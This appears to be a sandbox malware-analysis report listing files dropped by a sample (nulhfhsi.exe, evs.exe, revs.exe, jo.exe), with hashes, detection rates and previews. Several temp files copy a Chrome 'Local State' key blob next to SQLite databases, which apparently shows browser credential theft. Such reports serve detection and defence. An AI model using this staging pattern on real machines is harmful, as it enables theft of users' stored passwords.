SHA-256: ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512: A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious: false
IE Cache URL: res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9002
Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\down[1]
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):748
                                                                                                                                                                                            Entropy (8bit):7.249606135668305
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                                            MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                                                                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\httpErrorPagesScripts[1]
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):12105
                                                                                                                                                                                            Entropy (8bit):5.451485481468043
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                                            MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                                                                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\NewErrorPageTemplate[1]
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1612
                                                                                                                                                                                            Entropy (8bit):4.869554560514657
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                                                                                                                                                            MD5:DFEABDE84792228093A5A270352395B6
                                                                                                                                                                                            SHA1:E41258C9576721025926326F76063C2305586F76
                                                                                                                                                                                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                                                                                                                                                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:res://ieframe.dll/NewErrorPageTemplate.css
                                                                                                                                                                                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddjaedok.t1x.ps1
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_het1b5au.ft2.psm1
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\evs.exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):309398
                                                                                                                                                                                            Entropy (8bit):6.8622477052521065
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:wY8ikhaPatWRhVd2ta4fAyQ8BHPg/bbe6:6IzRha0wlPsb5
                                                                                                                                                                                            MD5:8C373745D8604DA05314DE16F0BF7CED
                                                                                                                                                                                            SHA1:14C4FF5FAED482F598A2D209D1288B72CEB633CF
                                                                                                                                                                                            SHA-256:13CB3BE20C296E15AD249F67E7D791DF34C7D7EBA819D08845BD244738A9F24E
                                                                                                                                                                                            SHA-512:EF58CE10E582AD80B4C1313E43EDDD5B13B856FAAAFBD9A10EE58A294006981E8F9D87BE75F98D085307F7A9F64B19B9E42736FF46CF76E1A9F1155C49C60493
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@........./.........r.../..............+......Rich...........PE..L......].................b....9.....H2............@..........................p<...........@.................................0.........:..............................................................................................................text....`.......b.................. ..`.rdata..>............f..............@..@.data...X.9..........z..............@....ndata.......@:..........................rsrc.........:......~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\hello_C# (2).exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\evs.exe
                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3584
                                                                                                                                                                                            Entropy (8bit):3.413295575615442
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:etGSATEYkF7qIjlVxI+ndtkZfxPclljKINPcAzxrsuZhNrfTqPNnqpdt4+lEbNFf:6XYbsfx5YJ1cll5OulbTGqXSfbNtm
                                                                                                                                                                                            MD5:D6B9F530E7E8DDEBEA8069A0D94AD38E
                                                                                                                                                                                            SHA1:28B7ADA0D7CBFACCC5CF66D2D22E08E9132B3C67
                                                                                                                                                                                            SHA-256:3E788314AC14E4F4040460E5140DAB61E2CF8968CF36E458EE875EC382787904
                                                                                                                                                                                            SHA-512:2F80E079AEAEC7ED92C0BF8216CE0C362BC63F104090185EBDD140C13B5D97FD57C84C3CE71700B18CA651C0C075A5567F84847A1389FBC32A199EB050468815
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exe, Detection: malicious, Browse
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7%.^.............................#... ...@....@.. ....................................@.................................p#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......| ...............................................................0...........r...p.r%..p...(....&*..(....*..BSJB............v4.0.30319......l.......#~..x.......#Strings....`...4...#US.........#GUID.......P...#Blob...........G.........%3........................................................8.1...o.O.....O.........................................P ......?.....r ......D.........J...D.....D...!.......D.......%....... .....................................(...............
C:\Users\user\AppData\Local\Temp\hello_C#.exe
Process: C:\Users\user\AppData\Local\Temp\evs.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3584
Entropy (8bit): 3.413295575615442
Encrypted: false
SSDEEP: 24:etGSATEYkF7qIjlVxI+ndtkZfxPclljKINPcAzxrsuZhNrfTqPNnqpdt4+lEbNFf:6XYbsfx5YJ1cll5OulbTGqXSfbNtm
MD5: D6B9F530E7E8DDEBEA8069A0D94AD38E
SHA1: 28B7ADA0D7CBFACCC5CF66D2D22E08E9132B3C67
SHA-256: 3E788314AC14E4F4040460E5140DAB61E2CF8968CF36E458EE875EC382787904
SHA-512: 2F80E079AEAEC7ED92C0BF8216CE0C362BC63F104090185EBDD140C13B5D97FD57C84C3CE71700B18CA651C0C075A5567F84847A1389FBC32A199EB050468815
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exe, Detection: malicious
C:\Users\user\AppData\Local\Temp\jo.exe
Process: C:\Users\user\AppData\Local\Temp\evs.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 309248
Entropy (8bit): 6.586028218669115
Encrypted: false
SSDEEP: 6144:u5IoCrSgLNdwesRGs1L3LNPeXSsJezvKc02k6XEhqLvpGTvz:uYSk7dsRGs1H9eXSsJexQvGv8T
MD5: 28E49F705BFD5A6785391BAC1C0E3359
SHA1: DF9EEBA64C82500D7C048E1C4ADDF02D3228C100
SHA-256: 1751A250EEFE8A940227887D05FC0547C7959F76418BC56689044564D2491116
SHA-512: E660EE72E57A3E796EDE9EC04EA3985C552E3F88DC616AB1BD7CA9E8F8CC05FC4F72D1AB4C141764EB6A63EFAB9A336DE5A35E595971768504AC6D323411F186
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 79%
C:\Users\user\AppData\Local\Temp\nsx24D0.tmp\KSRDY0PL.dll
Process: C:\Users\user\AppData\Local\Temp\evs.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 6656
Entropy (8bit): 5.150852446596736
Encrypted: false
SSDEEP: 96:4BNbUVOFvfcxEAxxxJzxLp+eELeoMEskzYzeHd0+uoyVeNSsX4:EUVOFvf9ABJFHE+FkEad0PLVeN
MD5: 293165DB1E46070410B4209519E67494
SHA1: 777B96A4F74B6C34D43A4E7C7E656757D1C97F01
SHA-256: 49B7477DB8DD22F8CF2D41EE2D79CE57797F02E8C7B9E799951A6C710384349A
SHA-512: 97012139F2DA5868FE8731C0B0BCB3CFDA29ED10C2E6E2336B504480C9CD9FB8F4728CCA23F1E0BD577D75DAA542E59F94D1D341F4E8AAEEBC7134BF61288C19
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: FG1eBAAwpR.exe, Detection: malicious
• Filename: 8XioA9UTsz.exe, Detection: malicious
• Filename: 8XioA9UTsz.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exe, Detection: malicious
• Filename: Build1.exe, Detection: malicious
• Filename: Build.exe, Detection: malicious
• Filename: s3X615I7Qn.exe, Detection: malicious
• Filename: DIGFK6SFVU.exe, Detection: malicious
• Filename: Cess5ioLRO.rtf, Detection: malicious
• Filename: svchost.exe, Detection: malicious
• Filename: svchost.exe, Detection: malicious
• Filename: ServHelp.msi, Detection: malicious
• Filename: ServHelp.msi, Detection: malicious
• Filename: FILE-71421.exe, Detection: malicious
C:\Users\user\AppData\Local\Temp\revs.exe
Process: C:\Users\user\AppData\Local\nulhfhsi.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4602592
Entropy (8bit): 7.945985609581206
Encrypted: false
SSDEEP: 98304:QPvYDnmWwqsSgx0Yn+bQVacRCBdYPtON7x2ojsU2xLQ2dG:QPAmfSgx0Y+bQQB7x2ojszxLI
MD5: 029CE2E532FE5C70D3342F978F5463D0
SHA1: E4E3041B291F1E581DEEBC1C219E1DF3FCCC0A6B
SHA-256: 507A7B00E9FBE68E5DD732BEA1BCE17F0451AB6C1250970A7CF0DDF5FBC2B83E
SHA-512: 380EE1044A9FE7170965166DDDF5D8731301A3A681462FD4946F505E556B2A278CFEC09D9113B8DE4B75499BA27CBB04E8BC40374DD8ED0E1959BE3B20B972B1
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 24%
• Antivirus: ReversingLabs, Detection: 90%
C:\Users\user\AppData\Local\Temp\tmp36BF.tmp
Process: C:\Users\user\AppData\Local\nulhfhsi.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 349054
Entropy (8bit): 6.015923338738634
Encrypted: false
SSDEEP: 6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
MD5: 8F78FB2B979EA740DEBFFA2E7C0C8BC1
SHA1: CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
SHA-256: 67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
SHA-512: 924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
Malicious: false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
C:\Users\user\AppData\Local\Temp\tmp36DF.tmp
Process: C:\Users\user\AppData\Local\nulhfhsi.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp36E0.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp3710.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):73728
                                                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp43E4.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp43E5.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp4425.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
